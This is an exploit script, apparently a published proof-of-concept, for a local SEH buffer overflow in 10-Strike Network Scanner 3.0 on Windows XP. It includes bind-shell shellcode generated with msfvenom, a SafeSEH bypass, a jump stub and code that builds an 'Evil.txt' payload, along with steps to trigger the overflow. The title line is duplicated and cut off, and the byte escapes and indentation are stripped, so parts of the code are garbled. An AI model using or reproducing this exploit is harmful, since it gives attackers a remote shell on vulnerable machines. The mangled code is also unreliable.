10-Strike Network Scanner 3.0 Local Buffer Overflow

#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : 10-Strike Network Scanner v3.0 - Local B #!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : 10-Strike Network Scanner v3.0 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : https://www.10-strike.com/ #
# Vulnerable Software: https://www.10-strike.com/network-scanner/network-scanner.exe #
# Tested on : Windows XP Professional - SP3 (x86) #
#----------------------------------------------------------------------------------------------------------#

# Disclosure Timeline:
# ====================
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published

'''
Steps to reproduce:
===================
- Copy contents of Evil.txt and paste in 'Host name or address' field under Add host.
- Right-click on newly created host and click 'Trace route...'.
- Repeat the second step and boom.
Notes:
======
- 'x00' get converted to 'x20' by the program eliminating the possibility of using [pop, pop, retn] pointers in base binary.
- All loaded modules are compiled with /SafeSEH.
- Right-click on newly created host and click 'System information>General' is effected by the same vulnerability with different
offsets and buffer size.
'''

#root@kali:~# msfvenom -p windows/shell_bind_tcp -b 'x00x0ax0d' -v shellcode -f python
#Payload size: 355 bytes
shellcode = ""
shellcode += "xb8x2bx29xa7x48xd9xe8xd9x74x24xf4x5b"
shellcode += "x29xc9xb1x53x31x43x12x03x43x12x83xc0"
shellcode += "xd5x45xbdxeaxcex08x3ex12x0fx6dxb6xf7"
shellcode += "x3exadxacx7cx10x1dxa6xd0x9dxd6xeaxc0"
shellcode += "x16x9ax22xe7x9fx11x15xc6x20x09x65x49"
shellcode += "xa3x50xbaxa9x9ax9axcfxa8xdbxc7x22xf8"
shellcode += "xb4x8cx91xecxb1xd9x29x87x8axccx29x74"
shellcode += "x5axeex18x2bxd0xa9xbaxcax35xc2xf2xd4"
shellcode += "x5axefx4dx6fxa8x9bx4fxb9xe0x64xe3x84"
shellcode += "xccx96xfdxc1xebx48x88x3bx08xf4x8bxf8"
shellcode += "x72x22x19x1axd4xa1xb9xc6xe4x66x5fx8d"
shellcode += "xebxc3x2bxc9xefxd2xf8x62x0bx5exffxa4"
shellcode += "x9dx24x24x60xc5xffx45x31xa3xaex7ax21"
shellcode += "x0cx0exdfx2axa1x5bx52x71xaexa8x5fx89"
shellcode += "x2exa7xe8xfax1cx68x43x94x2cxe1x4dx63"
shellcode += "x52xd8x2axfbxadxe3x4axd2x69xb7x1ax4c"
shellcode += "x5bxb8xf0x8cx64x6dx6cx84xc3xdex93x69"
shellcode += "xb3x8ex13xc1x5cxc5x9bx3ex7cxe6x71x57"
shellcode += "x15x1bx7ax46xbax92x9cx02x52xf3x37xba"
shellcode += "x90x20x80x5dxeax02xb8xc9xa3x44x7fxf6"
shellcode += "x33x43xd7x60xb8x80xe3x91xbfx8cx43xc6"
shellcode += "x28x5ax02xa5xc9x5bx0fx5dx69xc9xd4x9d"
shellcode += "xe4xf2x42xcaxa1xc5x9ax9ex5fx7fx35xbc"
shellcode += "x9dx19x7ex04x7axdax81x85x0fx66xa6x95"
shellcode += "xc9x67xe2xc1x85x31xbcxbfx63xe8x0ex69"
shellcode += "x3ax47xd9xfdxbbxabxdax7bxc4xe1xacx63"
shellcode += "x75x5cxe9x9cxbax08xfdxe5xa6xa8x02x3c"
shellcode += "x63xd8x48x1cxc2x71x15xf5x56x1cxa6x20"
shellcode += "x94x19x25xc0x65xdex35xa1x60x9axf1x5a"
shellcode += "x19xb3x97x5cx8exb4xbd"

magic = 'xd9xee' # fldz
magic += 'xd9x74x24xf4' # fnstenv [esp-0xc]
magic += 'x59' # pop ecx
magic += 'x80xc1x05' # add cl,0x5
magic += 'x80xc1x05' # add cl,0x5
magic += 'x90' # nop
magic += 'xfexcd' # dec ch
magic += 'xfexcd' # dec ch
magic += 'xffxe1' # jmp ecx

buffer = 'x90' * 28 # nops
buffer += shellcode # bind shell
buffer += 'xcc' * (516-28-len(shellcode)) # filler to nSEH
buffer += 'x75x06x74x06' # nSEH | jump net
buffer += 'x18x05xfcx7f' # SEH | 0x7ffc0518 : pop edi # pop edi # ret [SafeSEH Bypass]
buffer += 'x90' * 5 # nops
buffer += magic # jump -512
buffer += 'xcc' * (3000-516-4-4-5-len(magic)) # junk

try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e